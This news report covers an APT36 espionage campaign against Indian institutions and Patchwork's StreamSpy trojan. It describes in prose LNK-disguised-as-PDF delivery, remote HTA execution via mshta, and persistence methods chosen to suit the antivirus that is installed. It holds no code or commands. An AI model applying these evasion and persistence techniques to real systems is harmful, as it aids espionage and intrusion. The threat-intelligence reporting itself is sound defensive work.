Indian government agencies, academic institutions, and strategic organizations are under a new wave of cyberattacks attributed to the threat actor Transparent Tribe, also known as APT36. The group is deploying advanced remote access trojans (RATs) that allow persistent control over infected systems.
According to cybersecurity firm CYFIRMA, the campaign relies on deceptive delivery methods, including weaponized Windows shortcut (LNK) files disguised as legitimate PDFs. The files are embedded with full PDF content to avoid raising suspicion. Once opened, these shortcuts execute a remote HTML Application (HTA) script via mshta.exe, which decrypts and loads the RAT payload directly into memory while displaying a decoy PDF to the victim.
APT36 has been active since at least 2013 and is known for using a variety of RATs, including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT. The group is strategically focused on cyber espionage, targeting entities involved in governance, education, and other sensitive sectors in India.
A notable feature of the malware is its ability to adapt persistence techniques based on the antivirus software installed on the compromised system. For instance:
- Kaspersky: Creates a hidden directory, writes an obfuscated HTA payload, and uses a startup LNK file for persistence.
- Quick Heal: Establishes persistence with a batch file and malicious LNK, launching the HTA payload through the script.
- Avast, AVG, Avira: Directly copies the payload into the Startup folder for execution.
- No recognized antivirus: Combines batch execution, registry-based persistence, and direct payload deployment.
The second-stage HTA payload includes a DLL named iinneldc.dll, which enables full RAT functionality, including remote control, file management, screenshot capture, clipboard access, and process manipulation.
Recent campaigns have also used malicious shortcuts disguised as government advisory PDFs, such as “NCERT-Whatsapp-Advisory.pdf.lnk,” to deploy a .NET-based loader that drops additional executables and DLLs. The attack chain includes retrieving an MSI installer from a remote server, displaying a decoy PDF, and establishing long-term persistence through Windows Registry modifications.
CYFIRMA notes that APT36 employs environment profiling, runtime manipulation, and advanced obfuscation to maximize reliability while evading detection. The group’s operations demonstrate continued sophistication in malware delivery and espionage targeting Indian strategic interests.
In a related development, another Indian-origin threat actor, Patchwork (aka Dropping Elephant or Maha Grass), has been linked to attacks targeting Pakistan’s defense sector. Researchers identified a Python-based backdoor distributed via MSBuild loaders and ZIP archives. Patchwork has recently deployed a new trojan, StreamSpy, which uses WebSocket and HTTP protocols for command-and-control (C2) communication.
StreamSpy shows advanced features such as file exfiltration, system reconnaissance, and persistence via registry keys or startup scripts. Security analysts note that StreamSpy and other trojans from the group share characteristics with previously observed RATs, highlighting ongoing tool evolution and collaboration between threat groups.
